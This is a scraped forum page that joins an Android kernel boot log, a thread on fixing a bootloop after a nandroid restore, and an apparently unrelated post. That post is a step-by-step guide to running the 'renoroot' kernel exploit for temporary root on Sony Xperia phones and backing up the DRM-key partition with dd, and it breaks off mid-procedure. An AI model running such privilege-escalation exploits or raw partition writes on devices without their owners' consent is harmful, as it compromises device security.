<6>[ 2.339569] [SMD]smd_alloc_channel() cid=08 size=08192 'SMD_DATA2'
<6>[ 2.340545] [SMD]smd_alloc_channel() cid=09 size=08192 'SMD_DATA3'
<6>[ 2.341217] [SMD]smd_alloc_channel() cid=10 size=08192 'SMD_DATA4'
<6>[ 2.342712] [SMD]smd_alloc_channel() cid=15 size=65536 'SMD_DATA9'
<5>[ 2.348907] 0x00000ab40000-0x00001ff60000 : "userdata"
<6>[ 2.694793] PPP generic driver version 2.4.2
<6>[ 2.695587] PPP Deflate Compression module registered
<6>[ 2.695892] PPP BSD Compression module registered
<6>[ 2.699340] PPP MPPE Compression module registered
<6>[ 2.699676] NET: Registered protocol family 24
<6>[ 2.701385] tun: Universal TUN/TAP device driver, 1.6
<6>[ 2.701690] tun: (C) 1999-2004 Max Krasnyansky <[email protected]>
<6>[ 2.706115] [USB] msm72k_probe
<6>[ 2.706451] [USB] accessory detect 1
<6>[ 2.706726] [USB] id_pin_gpio 19
<6>[ 2.707000] [USB] dock detect 0
<6>[ 2.707275] [USB] dock pin gpio 0
<6>[ 2.707763] [USB] msm72k_probe() io=e481c000, irq=47, dma=ffa48000(26ef6000)
<6>[ 2.710296] android init
<6>[ 2.710784] android_probe pdata: c0509938
<6>[ 2.711273] android_bind
<7>[ 2.711578] android_bind_config
<6>[ 2.712707] android_usb gadget: android_usb ready
<6>[ 2.713012] [USB] msm72k_udc: registered gadget driver 'android_usb'
<6>[ 2.713775] f_adb init
<6>[ 2.714050] android_register_function adb
<6>[ 2.714355] f_mass_storage init
<6>[ 2.714996] fsg_probe pdev: c0509a98, pdata: c050a484
<6>[ 2.715454] android_register_function usb_mass_storage
<6>[ 2.715728] f_rndis init
<6>[ 2.716491] android_register_function rndis
<6>[ 2.716766] f_accessory init
<6>[ 2.717041] android_register_function accessory
<6>[ 2.717559] diag init
<6>[ 2.717864] android_register_function diag
<6>[ 2.718170] rndis_function_bind_config MAC: 00:00:00:00:00:00
<4>[ 2.718841] android_usb gadget: using random self ethernet address
<4>[ 2.719177] android_usb gadget: using random host ethernet address
<6>[ 2.721954] acc_bind_config
<6>[ 2.723724] [USB] hsusb: IDLE -> ONLINE
<6>[ 2.724060] [USB] lpm exit
<6>[ 2.724639] [USB] hsusb: reset controller
<6>[ 2.725219] android_usb gadget: Mass Storage Function, version: 2009/09/11
<6>[ 2.725524] android_usb gadget: Number of LUNs=1
<6>[ 2.726074] lun0: LUN: removable file: (no medium)
<6>[ 2.726623] adb_bind_config
<6>[ 2.727661] diag_bind_config
<6>[ 2.728210] [SMD]SMD: ch 1 0 -> 1
<6>[ 2.728546] [SMD]SMD: ch 1 1 -> 2
<6>[ 2.729675] buzz_syn_ts_power: power 1
<6>[ 2.762145] msm_hsusb_phy_reset
<6>[ 2.912231] [USB] ulpi: write 0x2c to 0x31
<6>[ 2.912536] [USB] ulpi: write 0x20 to 0x32
<6>[ 2.913024] [USB] ulpi: write 0x01 to 0x0d
<6>[ 2.913299] [USB] ulpi: write 0x01 to 0x10
<6>[ 2.913604] [USB] handle_notify_offline: notify offline
<6>[ 2.914154] [USB] msm_hsusb: enable pullup
<6>[ 2.917449] [USB] suspend
<6>[ 2.932250] [USB] not AC charger
<6>[ 2.932800] [USB] accessory_detect_init: id pin 19
<6>[ 2.993591] synaptics_ts_probe: panel_version: 301
<6>[ 2.995056] max_x: 3DE, max_y: 5A6
<6>[ 2.996887] synaptics_ts_probe: max_x 990, max_y 1446
<6>[ 2.997161] input_set_abs_params: mix_x 0, max_x 990, min_y 0, max_y 1300
<6>[ 2.998229] input: synaptics-rmi-touchscreen as /devices/virtual/input/input1
<6>[ 2.999450] synaptics_ts_probe: Start touchscreen synaptics-rmi-touchscreen in interrupt mode
<6>[ 3.000122] atmel_ts_init():
<6>[ 3.000915] buzz_ts_atmel_power():
<6>[ 3.023895] [USB] reset
<6>[ 3.024291] [USB] send connect type 1
<6>[ 3.024566] [BATT] online=1
<6>[ 3.024841] [BATT] Update SMEM: cable type 1 at 1403189275 (1970-01-01 00:00:01.402670622 UTC)
<6>[ 3.026184] [USB] portchange USB_SPEED_HIGH
<6>[ 3.184234] [USB] reset
<6>[ 3.186492] [USB] portchange USB_SPEED_HIGH
<6>[ 3.282318] No Messages after reset
<3>[ 3.282989] msm_i2c msm_i2c.0: error, status c8 (4A,00,01)(20,13,01)(cnt:7,pos:0)
<3>[ 3.283325] msm_i2c msm_i2c.0: Error during data xfer (-5) (4A,00,01)
<6>[ 3.283874] No Atmel chip inside
<4>[ 3.284362] atmel_qt602240: probe of 0-004a failed with error -5
<6>[ 3.285217] [PS][CM3602] capella_cm3602_probe: probe
<6>[ 3.286346] input: proximity as /devices/virtual/input/input2
<6>[ 3.287506] [PS][CM3602] capella_cm3602_setup
<6>[ 3.288635] [KEY] GPIO Matrix Keypad Driver: Start keypad matrix for buzz-keypad... in interrupt mode
<6>[ 3.289764] [KEY] GPIO_Input_ISR : 0, return IRQ_HANDLED;
<6>[ 3.290252] [KEY] GPIO Input Driver: Start gpio inputs for buzz-keypad... in interrupt mode
<6>[ 3.291442] input: buzz-keypad as /devices/virtual/input/input3
<6>[ 3.292602] input: buzz-nav as /devices/virtual/input/input4
<6>[ 3.294708] input: lightsensor-level as /devices/virtual/input/input5
<6>[ 3.295867] [KEY] gpio_keys_scan_keys: key 1-116, 0 (20) changed to 0
<6>[ 3.296295] [LS][CM3602] set_ls_kvalue: ALS calibrated als_kadc=0x6da5007b
<6>[ 3.296813] [LS][CM3602] set_ls_kvalue: als_kadc=0x7b, als_gadc=0xcf
<6>[ 3.297088] [LS][CM3602] ls_table: data[0] , data[0] = 0, 0
<6>[ 3.297607] [LS][CM3602] ls_table: data[1] , data[1] = 0, 1
<6>[ 3.297882] [LS][CM3602] ls_table: data[2] , data[2] = 0, 2
<6>[ 3.298370] [LS][CM3602] ls_table: data[3] , data[3] = 0, 8
<6>[ 3.298645] [LS][CM3602] ls_table: data[4] , data[4] = 0, 16
<6>[ 3.299163] [LS][CM3602] ls_table: data[5] , data[5] = 0, 59
<6>[ 3.299438] [LS][CM3602] ls_table: data[6] , data[6] = 0, a2
<6>[ 3.299957] [LS][CM3602] ls_table: data[7] , data[7] = 0, b1
<6>[ 3.300231] [LS][CM3602] ls_table: data[8] , data[8] = 0, bf
<6>[ 3.300720] [LS][CM3602] ls_table: data[9] , data[9] = 3, ff
<7>[ 3.303375] __capella_cm3602_power: Turn the capella_cm3602 power on
<6>[ 3.305236] input: curcial-oj as /devices/virtual/input/input6
<3>[ 3.307250] curcial_oj_poweron:eek:J:power status ok
<6>[ 3.356567] OpticalJoystick Device ID: 0d
<6>[ 3.359466] OJ Driver: Revision : 02
<6>[ 3.362548] OJ: driver loaded
<6>[ 3.365692] using rtc device, msm_rtc, for alarms
<6>[ 3.366058] rs30000048:915823fc rs30000048:915823fc: rtc core: registered msm_rtc as rtc0
<6>[ 3.367004] AKM8973 compass driver: init
<6>[ 3.368713] input: compass as /devices/virtual/input/input7
<6>[ 3.370635] [FLT]adp1650 Led Flash driver: init
<4>[ 3.371124] [CAM]s5k4e1gx_init
<4>[ 3.371643] [CAM]__s5k4e1gx_probe
<6>[ 3.372161] [CAM]s5k4e1gx_vreg_enable camera vreg on
<6>[ 3.372772] [CAM]sctrl.node 0
<4>[ 3.373046] [CAM]s5k4e1gx_sensor_probe()
<6>[ 3.373657] [CAM]s5k4e1gx_probe called!
<6>[ 3.424224] [CAM]s5k4e1gx_probe successed! rc = 0
<6>[ 3.424652] [CAM]s5k4e1gx s->node 0
<6>[ 3.437164] android_usb gadget: high speed config #1: android
<6>[ 3.471588] [CAM]s5k4e1gx_sensor_init(): reseting sensor.
<6>[ 3.472961] [CAM]sensor_lc_disable=0
<4>[ 3.568450] [CAM]sensor evt version : 0x10
<4>[ 3.568725] [CAM]use analog_settings_evt3
<6>[ 3.580780] s5k4e1gx_sysfs_init : kobject_create_and_add
<6>[ 3.581146] s5k4e1gx_sysfs_init : sysfs_create_file
<6>[ 3.583343] device-mapper: uevent: version 1.0.3
<6>[ 3.584838] device-mapper: ioctl: 4.17.0-ioctl (2010-03-05) initialised: [email protected]
<6>[ 3.585510] Bluetooth: HCI UART driver ver 2.2
<6>[ 3.585784] Bluetooth: HCI H4 protocol initialized
<6>[ 3.587799] cpuidle: using governor ladder
<6>[ 3.588104] cpuidle: using governor menu
<6>[ 3.589965] mmc0: Qualcomm MSM SDCC at 0x00000000a0400000 irq 24,0 dma 8
<6>[ 3.590484] mmc0: Platform slot type: N/A
<6>[ 3.590759] mmc0: 4 bit data mode enabled
<6>[ 3.591278] mmc0: 8 bit data mode disabled
<6>[ 3.591552] mmc0: MMC clock 144000 -> 49152000 Hz, PCLK 80000000 Hz
<6>[ 3.591827] mmc0: Slot eject status = 1
<6>[ 3.592437] mmc0: Power save feature enable = 1
<6>[ 3.592712] mmc0: DM non-cached buffer at ffa4a000, dma_addr 0x26f55000
<6>[ 3.593231] mmc0: DM cmd busaddr 0x26f55000, cmdptr busaddr 0x26f55300
<6>[ 3.594573] buzz_sdslot_switchvdd: Disabling SD slot power
<6>[ 3.595428] mmc1: Qualcomm MSM SDCC at 0x00000000a0500000 irq 26,102 dma 8
<6>[ 3.595733] mmc1: Platform slot type: SD
<6>[ 3.596221] mmc1: 4 bit data mode enabled
<6>[ 3.596496] mmc1: 8 bit data mode disabled
<6>[ 3.596984] mmc1: MMC clock 144000 -> 49152000 Hz, PCLK 80000000 Hz
<6>[ 3.597259] mmc1: Slot eject status = 1
<6>[ 3.597534] mmc1: Power save feature enable = 1
<6>[ 3.598022] mmc1: DM non-cached buffer at ffa4b000, dma_addr 0x26f56000
<6>[ 3.598327] mmc1: DM cmd busaddr 0x26f56000, cmdptr busaddr 0x26f56300
<7>[ 3.599487] Registered led device: amber
<7>[ 3.600006] Registered led device: green
<7>[ 3.600677] Registered led device: jogball-backlight
<7>[ 3.601135] Registered led device: button-backlight
<6>[ 3.601654] microp_led_probe: succeeded
<6>[ 3.604522] logger: created 256K log 'log_main'
<6>[ 3.605133] logger: created 256K log 'log_events'
<6>[ 3.605926] logger: created 256K log 'log_radio'
<6>[ 3.606445] logger: created 256K log 'log_system'
<6>[ 3.607299] zram: num_devices not specified. Using default: 1
<6>[ 3.607574] zram: Creating 1 devices ...
<6>[ 3.609008] GACT probability NOT on
<6>[ 3.609558] Mirror/redirect action on
<6>[ 3.609832] u32 classifier
<6>[ 3.610076] Actions configured
<6>[ 3.610595] Netfilter messages via NETLINK v0.30.
<6>[ 3.611083] nf_conntrack version 0.5.0 (4996 buckets, 19984 max)
<4>[ 3.611846] CONFIG_NF_CT_ACCT is deprecated and will be removed soon. Please use
<4>[ 3.612518] nf_conntrack.acct=1 kernel parameter, acct=1 nf_conntrack module option or
<4>[ 3.613037] sysctl net.netfilter.nf_conntrack_acct=1 to enable it.
<6>[ 3.613647] ctnetlink v0.93: registering with nfnetlink.
<6>[ 3.614288] NF_TPROXY: Transparent proxy support initialized, version 4.1.0
<6>[ 3.614593] NF_TPROXY: Copyright (c) 2006-2007 BalaBit IT Ltd.
<6>[ 3.615936] xt_time: kernel timezone is -0000
<6>[ 3.616363] IPv4 over IPv4 tunneling driver
<6>[ 3.617950] GRE over IPv4 tunneling driver
<6>[ 3.619628] ip_tables: (C) 2000-2006 Netfilter Core Team
<6>[ 3.620452] arp_tables: (C) 2002 David S. Miller
<6>[ 3.620880] TCP cubic registered
<6>[ 3.621704] NET: Registered protocol family 10
<6>[ 3.626342] Mobile IPv6
<6>[ 3.626800] ip6_tables: (C) 2000-2006 Netfilter Core Team
<6>[ 3.627410] IPv6 over IPv4 tunneling driver
<6>[ 3.630920] NET: Registered protocol family 17
<6>[ 3.631317] NET: Registered protocol family 15
<6>[ 3.632507] Bluetooth: RFCOMM socket layer initialized
<6>[ 3.633026] Bluetooth: RFCOMM ver 1.11
<6>[ 3.633361] Bluetooth: BNEP (Ethernet Emulation) ver 1.3
<6>[ 3.633850] Bluetooth: HIDP (Human Interface Emulation) ver 1.2
<6>[ 3.634796] clock_late_init() disabled 16 unused clocks
<6>[ 3.635345] [Port list] init()
<6>[ 3.635620] [Port list] Virtual Address for port_list: [f8149a48]
<6>[ 3.636108] [Port list] Physical Address for port_list: [849A48]
<6>[ 3.637756] cpufreq: cpu0 init at 480000 switching to 352000
<6>[ 3.642211] rs30000048:915823fc rs30000048:915823fc: setting system clock to 2013-12-16 11:43:36 UTC (1387194216)
<4>[ 3.643127] Warning: unable to open an initial console.
<6>[ 3.643981] Freeing init memory: 144K
<6>[ 3.918975] keychord: using input dev h2w headset for fevent
<6>[ 3.919464] keychord: using input dev buzz-keypad for fevent
<6>[ 3.926330] yaffs: dev is 32505859 name is "mtdblock3"
<6>[ 3.926757] yaffs: passed flags ""
<4>[ 3.927001] yaffs: Attempting MTD mount on 31.3, "mtdblock3"
<4>[ 4.099121] yaffs: restored from checkpoint
<4>[ 4.100067] yaffs_read_super: isCheckpointed 1
<6>[ 4.103546] yaffs: dev is 32505861 name is "mtdblock5"
<6>[ 4.104003] yaffs: passed flags ""
[COLOR="Red"]<4>[ 4.104248] yaffs: Attempting MTD mount on 31.5, "mtdblock5"
<4>[ 4.712463] block 725 is bad
<4>[ 4.744262] block 845 is bad
<4>[ 4.797912] block 1049 is bad[/COLOR]
<4>[ 18.353271] Partially written block 1006 detected
<4>[ 18.353942] Partially written block 1006 detected
<4>[ 18.354339] Partially written block 1006 detected
<4>[ 18.354766] Partially written block 1006 detected
<4>[ 18.355346] Partially written block 1006 detected
<4>[ 18.355773] Partially written block 1006 detected
<4>[ 18.356353] Partially written block 1006 detected
<4>[ 18.356781] Partially written block 1006 detected
<4>[ 18.357360] Partially written block 1006 detected
<4>[ 18.357788] Partially written block 1006 detected
<4>[ 18.358184] Partially written block 1006 detected
<4>[ 18.358795] Partially written block 1006 detected
<4>[ 18.359191] Partially written block 1006 detected
<4>[ 18.359802] Partially written block 1006 detected
<4>[ 18.360198] Partially written block 1006 detected
<4>[ 18.360595] Partially written block 1006 detected
<4>[ 18.361206] Partially written block 1006 detected
<4>[ 18.361633] Partially written block 1006 detected
<4>[ 18.362213] Partially written block 1006 detected
<4>[ 18.362640] Partially written block 1006 detected
<4>[ 18.363250] Partially written block 1006 detected
<4>[ 18.363677] Partially written block 1006 detected
<4>[ 18.364105] Partially written block 1006 detected
<4>[ 18.364715] Partially written block 1006 detected
<4>[ 18.460662] yaffs_read_super: isCheckpointed 0
<6>[ 18.461517] yaffs: dev is 32505860 name is "mtdblock4"
<6>[ 18.461791] yaffs: passed flags ""
<4>[ 18.462005] yaffs: Attempting MTD mount on 31.4, "mtdblock4"
<4>[ 18.521240] yaffs_read_super: isCheckpointed 0
<3>[ 20.180206] init: service 'console' requires console
<6>[ 20.258422] enabling adb
<6>[ 20.281280] [USB] msm_hsusb: disable pullup
<6>[ 20.293457] [USB] msm_hsusb: enable pullup
<6>[ 20.297027] [USB] suspend
<6>[ 20.311981] adb_open
<6>[ 20.482727] [USB] reset
<6>[ 20.483032] [USB] handle_notify_offline: notify offline
<6>[ 20.484069] adb_release
<6>[ 20.485015] [USB] portchange USB_SPEED_HIGH
<6>[ 20.485534] adb_open
<6>[ 20.642822] [USB] reset
<6>[ 20.645080] [USB] portchange USB_SPEED_HIGH
<6>[ 20.715698] warning: `rild' uses 32-bit capabilities (legacy support in use)
<6>[ 20.854614] android_usb gadget: high speed config #1: android
<6>[ 20.928436] [SMD]SMD: ch 0 0 -> 1
<6>[ 20.928771] [SMD]SMD: ch 0 1 -> 2
<6>[ 20.939819] [SMD]SMD: ch 38 0 -> 1
<6>[ 20.940155] [SMD]SMD: ch 38 1 -> 2
<6>[ 20.940368] [RIL] qmi: smd opened
<6>[ 20.942810] [RIL] qmi: ctl: wds use client_id 0x01
<6>[ 20.947113] [SMD]SMD: ch 39 0 -> 1
<6>[ 20.947448] [SMD]SMD: ch 39 1 -> 2
<6>[ 20.947875] [RIL] qmi: smd opened
<6>[ 20.948699] [RIL] qmi: ctl: wds use client_id 0x01
<6>[ 20.950500] [SMD]SMD: ch 40 0 -> 1
<6>[ 20.951080] [SMD]SMD: ch 40 1 -> 2
<6>[ 20.951324] [RIL] qmi: smd opened
<6>[ 20.952941] [RIL] qmi: ctl: wds use client_id 0x01
<6>[ 22.985412] [AUD][snd.c:snd_ioctl] snd_set_device 1 1 1
<6>[ 22.989074] [AUD][snd.c:snd_rpc_thread] snd_rpc_thread() start
<6>[ 22.989624] [AUD][snd.c:snd_rpc_thread] snd: rpc_reply status 0
<6>[ 22.992858] [AUD][snd.c:snd_ioctl] snd_set_volume 256 0 5
<6>[ 22.996887] [AUD][snd.c:snd_rpc_thread] snd: rpc_reply status 0
As you can see
<4>[ 4.104248] yaffs: Attempting MTD mount on 31.5, "mtdblock5"
<4>[ 4.712463] block 725 is bad
<4>[ 4.744262] block 845 is bad
<4>[ 4.797912] block 1049 is bad
Click to expand...
Click to collapse
Does that indicate bad blocks on SDCard ?
So i have reviewed your logcat and its not showing up anything that could make it bootloop :/ can you use nandroid manager to restore just the app data and see how it gets on for me? it shouldnt need to reboot to do it.
heavy_metal_man said:
So i have reviewed your logcat and its not showing up anything that could make it bootloop :/ can you use nandroid manager to restore just the app data and see how it gets on for me? it shouldnt need to reboot to do it.
Click to expand...
Click to collapse
Okay,thanks,I restored some user apps and system apps (including data).Some apps are working fine and restored back to previous state including CM Settings but some apps got messed up and data didn't get restored.
What should be the next move ?
optimusodd said:
Okay,thanks,I restored some user apps and system apps (including data).Some apps are working fine and restored back to previous state including CM Settings but some apps got messed up and data didn't get restored.
What should be the next move ?
Click to expand...
Click to collapse
Well that tells us that the nandroid back up has became corrupted somehow, or your sdcard partition is not the same as your nandroids. If it's corruption your pretty stuffed and will have to just start fresh, but I would first double check your partitioning and then attempt a final restore with nandroid manager. If it fails then delete the apps that don't work data and keep what works I suppose :/
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
heavy_metal_man said:
Well that tells us that the nandroid back up has became corrupted somehow, or your sdcard partition is not the same as your nandroids. If it's corruption your pretty stuffed and will have to just start fresh, but I would first double check your partitioning and then attempt a final restore with nandroid manager.
Click to expand...
Click to collapse
Thanks for the reply.
Huh,What do you mean by sdcard partition is not the same ?
Okay let me go into a little more detail.Few months back I was using 8GB card.And the nandoid backup I want to restore was taken on that card.
MTD partition size : 110 10
Ext3 :512 MB
Now I am using 16GB card with 1GB Ext3 partition.
No custom MTD partition.
Do I need to run custom MTD script ?
SDCard partition could be a problem if I was using a card of less capacity.But as both the memory capacity and the size of Ext3 partition are larger in this scenario so I think partition should not be a problem.
Correct me if I am wrong
Furthermore,the same nandroid backup got restored perfectly using the new card before that kernel and radio thing.Gah!
optimusodd said:
Thanks for the reply.
Huh,What do you mean by sdcard partition is not the same ?
Okay let me go into a little more detail.Few months back I was using 8GB card.And the nandoid backup I want to restore was taken on that card.
MTD partition size : 110 10
Ext3 :512 MB
Now I am using 16GB card with 1GB Ext3 partition.
No custom MTD partition.
Do I need to run custom MTD script ?
SDCard partition could be a problem if I was using a card of less capacity.But as both the memory capacity and the size of Ext3 partition are larger in this scenario so I think partition should not be a problem.
Correct me if I am wrong
Furthermore,the same nandroid backup got restored perfectly using the new card before that kernel and radio thing.Gah!
Click to expand...
Click to collapse
If you made the nandroid with a custom mtd the you had best restore it with a custom mtd. I'm not 100% sure how it's done or the theory around it though, it's been a long time since I've had to do such things.
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
heavy_metal_man said:
If you made the nandroid with a custom mtd the you had best restore it with a custom mtd. I'm not 100% sure how it's done or the theory around it though, it's been a long time since I've had to do such things.
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
Click to expand...
Click to collapse
Alright,buddy,I give it a try.:fingers-crossed:
Happy New Year! Well, sorry for being a bit unresponsive - I'm really late (and still have no time) - just a quick $ 0.02: if I'm not totally mistaken it makes a huge difference if you use custom mtd partitions. The recovery makes an image of the partitions which means on restore the same size is expected (which would also apply to your sd-ext...)
Best bet should be: make a restore with the old settings (custom mtd partitions and sd-ext) and sequentially backup the stuff in other ways than with a nandroid backup. See if it works. Alternatively you could extract the stuff out of the backup - but this might become really painful...
Hope this helps.
BTW: my problem you were refering to has been totally different as I've never been stuck on boot - I had massive random reboots - so this was another story...
heavy_metal_man said:
If you made the nandroid with a custom mtd the you had best restore it with a custom mtd. I'm not 100% sure how it's done or the theory around it though, it's been a long time since I've had to do such things.
Click to expand...
Click to collapse
eventcom said:
if I'm not totally mistaken it makes a huge difference if you use custom mtd partitions. The recovery makes an image of the partitions which means on restore the same size is expected (which would also apply to your sd-ext...)
Click to expand...
Click to collapse
Hello guys,Belated Happy New Year!!!Sorry for the late response.I was out of town and didn't have a chance to check the thread until today.I had finally got it working on 29th Dec after 15 days tearing my hair out trying to fix it.
Ah,after trying a lot of things and epic struggle finally some peace and quiet.:victory:
Thank you very much "heavy_metal_man" for your continued support and kind cooperation.I couldn't have done this without your inexhaustible support.I really appreciate it.
Thank you "eventcom" for the reply.I appreciate it.Though you were a bit late but you got it right.Probably it was the MTD thing.
I am not sure what exactly happened and what did the trick in the end.In all probability it was MTD partition thing which was messing up.
Not is case of Ext partition though.Because as I have mentioned my previous ext3 was 512 MB while now I am using 1GB Ext3 partition.
So I think Restore with old MTD settings and Ext partition >/= previous Ext partition should do the job.
Steps followed:
>Unroot and S-ON
http://forum.xda-developers.com/showthread.php?p=22832599
>Root
http://forum.xda-developers.com/showthread.php?t=1145035&nocache=1&nocache=1
>Data Wipe - Factory Reset
>Wipe Cache Partition
>Format /cache
>Format /system
>Format /data
>Wipe cache partition
>Wipe Dalvik Cache
>Create text file with custom MTD partition settings you had while taking Nandroid Backup
>Go to Recovery
>Mounts and Storage
>Format /cache
>Format /system
>Format /data
>Wipe Data / Factory Reset
>Flash "recovery-v1.5.8-Beta-CustomMTD_S.zip"
>Go to Advanced
>Reboot Recovery
>Restore Nandroid Backup
>Fix permissions
>Without restarting, flash "boot-v1.5.8-Beta-CustomMTD_S.zip"
>Reboot device
After Nandroid Restore Superuser started malfunctioning.Apps (including Titanium Backup) requiring ROOT access were not getting required permissions while it was being displayed that Superuser had granted the permissions.Anyway,was able to resolve that problem somehow and now my device is working perfectly.:victory:
Tools to backup TA partition (drm keys) of Xperia XZ1 Compact
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
by j4nn
https://j4nn.github.io/
As everyone knows, bootloader unlock via code from sony removes drm keys. That disables certain functions, the most critical one being the camera (outputting only solid green pictures in case of oreo fw).
I've implemented tools that allow to backup the whole TA partition, which contains device master key needed to access sony drm keys and restore the TA after bootloader unlock in order to make the camera (among other things) working again on any sony stock firmware.
In order to be able to use the tools, you need to flash one of the supported firmwares (or be lucky to have the phone already running it).
In case you need to downgrade, please check this thread first.
Anybody who is about to unlock your phone, could you please do so with additional test included?
See post#500 and post#502 for more details.
Additional details in post#515, post#516, post#517 and post#527.
Instructions for the test that I kindly ask anybody who is about to unlock to do are described in the post#520 -- tested already.
Thank you.
ABOUT THE TOOLS
renosploit - rename/notify exploit to get kernelspace read/write, uses multiple vulnerabilities to overcome kaslr, pxn and pan mitigations of android oreo
renotrap - helper application (rename/notify temp root app)
renoshell - get temp root shell by use of kernel space read/write primitives provided by renosploit (sources available here)
renoroot - a shell script to be started from adb, it starts the above tools to get temp root shell
A preview video of the tools in action can be downloaded here: renoroot-preview.zip or watched online here.
As an alternative to renoroot you may use 'bindershell' to get a temp root shell for TA backup - it is available here /added on 2020-02-08/
SUPPORTED TARGETS
(with downloadable firmware links)
Sony Xperia XZ1 Compact (G8441)
47.1.A.2.324_CE1 (initial tested by @tramtrist, this release tested by @tanapoom1234 post#212)
47.1.A.8.49_CE1 (tested by @notaz post#224 and @orsonmmz post#232)
Sony Xperia XZ1 (G8341/G8343)
47.1.A.2.324_CE1 (tested by @HandyMenny post#228)
Sony Xperia XZ1 Dual (G8342)
47.1.A.2.281_CE1 (tested by @Vildanoff post#230)
Sony Xperia XZ1 (SOV36) /added on 2019-08-22/
this Japan version can be flashed with fw for G8431 making it exploitable as standard XZ1 (the possibility to use G8431 fw is confirmed here and also here)
/this confirms there might be a possibility of TA backup for few yoshino platform phone models that are possible to flash with one of the above firmwares (and boot ok even though designed for other phone variant)/
Sony Xperia XZ Premium (G8141)
47.1.A.3.254_CE1 (tested by @DocLM post#227, by @LinFan post#242 and by @steso90 xzp forum post#45)
Sony Xperia XZ Premium Dual (G8142)
47.1.A.3.254_RU (tested by @greatpatel007 xzp forum post#31 and #39)
Sony Xperia XZ Premium (G8188) /added on 2019-04-24/
this Japan version can be flashed with fw for G8141 making it exploitable as standard XZp (tested by zatsune as documented here)
/this confirms there might be a possibility of TA backup for few yoshino platform phone models that are possible to flash with one of the above firmwares (and boot ok even though designed for other phone variant)/
An advice: before flashing anything, enable 'OEM Unlocking' in android developer menu and if flashing a fw for different phone model, skip flashing bootloader (i.e. remove boot/ subdirectory completely before using newflasher). /added on 2019-08-27/
Please note: the temp root exploit (all renoroot tools) are designed only for the above firmware versions (binary kernels builds in them) - there is no chance it would work on other phones or other kernel builds - do not try it, it would not work.
Concerning portability to other targets, the exploit itself needs several vulnerabilities not fixed in a kernel, the primary one is CVE-2017-7533 (race between inotify and rename).
This was patched by google with 2017-12-05 security patch level. That means unless you can flash a firmware with older security patch level, it would not make sense to try to adapt the exploit for a new target (like it is a case with XZ2 Compact device for example).
USING THE TOOLS
Please follow the steps bellow for a official and up to date guide. If something was not clear enough, you may also check post#382 from @munted for a pdf guide with screenshots possibly containing more details and windows specific hints.
backup everything you need from your phone
flash compatible firmware
Before flashing, you may take a screenshot of service menu -> service tests -> security possibly together with current sw version screen for reference and copy them from the phone to your PC.
You can use newflasher tool from @munjeni and use instructions there to flash the firmware.
The tool should skip dangerous .ta files automatically. You may consider removing Just remove the persist_X-FLASH-ALL-42E5.sin file, which is discussed here to avoid flashing it - as tested by @tanapoom1234, not flashing the persist partition allows to keep the Android Attest Key - check his post#212. /Added on 2019-04-06: The key is not part of TA obviously, it is present in the persist partition, so never flash persist even after TA backup./
/Added on 2019-04-09: When flashing a firmware, be sure to flash it's bootloader too (i.e. the whole 'boot' directory needs to be present with all files in it including the .ta there). You might skip appslog, diag, Qnovo and ssd./
In case of downgrade it is needed to flash userdata (and possibly also cache) otherwise you get a boot loop.
Just backup your stuff before downgrade as with downgrade comes a factory reset. In fact I would recommend to do a factory reset just before the downgrade in order to remove the binding to your google account. This way you can avoid going online after the downgrade if used without sim and skipping wifi configuration.
prepare your phone
When the phone boots up, try to avoid connecting to internet by selecting only wifi and not configuring any, skipping accounts setup for later.
This may not always be possible - if persist is not flashed, android insists on setup of google account online, also starting downloads for upgrade.
Cancel everything as soon as possible and disable wifi. You may be better not using a data enabled sim card - we try to avoid any updates.
Disable auto updates of both apps and system. Change the theme from animated backgroud to a static one.
Enable developer menu, enable adb and "Stay awake" option. An youtube video showing the initial setup to prepare for renoroot is available here.
Take a screenshot of service menu -> service tests -> security for reference and copy it from the phone.
Again be sure both wifi and mobile data connection are disabled to avoid any background internet access.
install the tools
Unzip renoroot.zip (download it bellow). Use following adb commands to get the tools to the phone:
Code:
adb push renoroot /data/local/tmp
adb push renoshell /data/local/tmp
adb push renosploit /data/local/tmp
adb install -r renotrap.apk
start the tools to get a temp root shell
Use adb shell to get a command line terminal to the phone and use following commands:
Code:
cd /data/local/tmp
chmod 755 reno*
./renoroot
The last command above will start the exploit eventually resulting with a temp root shell (that should be indicated by # char before the cursor).
It may get the phone to reboot in case an overwrite does not hit the wanted shaped heap object.
You may wait few minutes after the phone boots to allow startup processes to settle down in order to avoid timing influence for next trial.
There is a video for example of this step available here.
backup your TA partition
When renoroot is successful, you may use following commands in the root shell to backup the trim area partition:
Code:
cd /data/local/tmp
dd if=/dev/block/bootdevice/by-name/TA of=TA-locked.img
chown shell:shell TA-locked.img
sync
sync
And then try to read it out from the phone to your PC - use another command prompt window, do not exit the root one:
Code:
adb pull /data/local/tmp/TA-locked.img
unlock phone's bootloader using a code from sony
When you have the TA-locked.img on your PC including screenshots, you may start the official Sony unlock procedure - follow instructions on sony website please.
Added on 2019-04-16: please note, bootloader unlocking is not reversible - it is not possible to re-lock back (restore of TA-locked does not relock the bootloader).
So be prepared to live with the boot up warning screen (can be seen for example in this video).
Again be sure you have the TA-locked.img on your PC before you start unlocking the bootloader - unlock will erase you phone, so it would get lost from /data/local/tmp if not backed up.
In case oem unlocking is grayed out (so you cannot enable it) you need to go online at least once and the option would be accessible then - video here.
After you unlock the bootloader, do not flash anything - just boot the same unmodified fw we used for the temp root.
get temp root again to restore TA
Use the same instructions to avoid internet access and updates as described above, configure the few above mentioned options and start renoroot as before.
With the temp root shell, backup the unlocked TA (for future comparisons) and then restore the state from the locked one. You may need to adb push the TA-locked.img back to /data/local/tmp as the unlock erased everything.
Code:
cd /data/local/tmp
dd if=/dev/block/bootdevice/by-name/TA of=TA-unlocked.img
chown shell:shell TA-unlocked.img
sync
sync
And then try to read it out from the phone to your PC (and transfer the locked TA back to the phone) - use another command prompt window, do not exit the root one:
Code:
adb pull /data/local/tmp/TA-unlocked.img
adb push TA-locked.img /data/local/tmp
And using the window with renoshell temp root shell, restore the TA:
Code:
cd /data/local/tmp
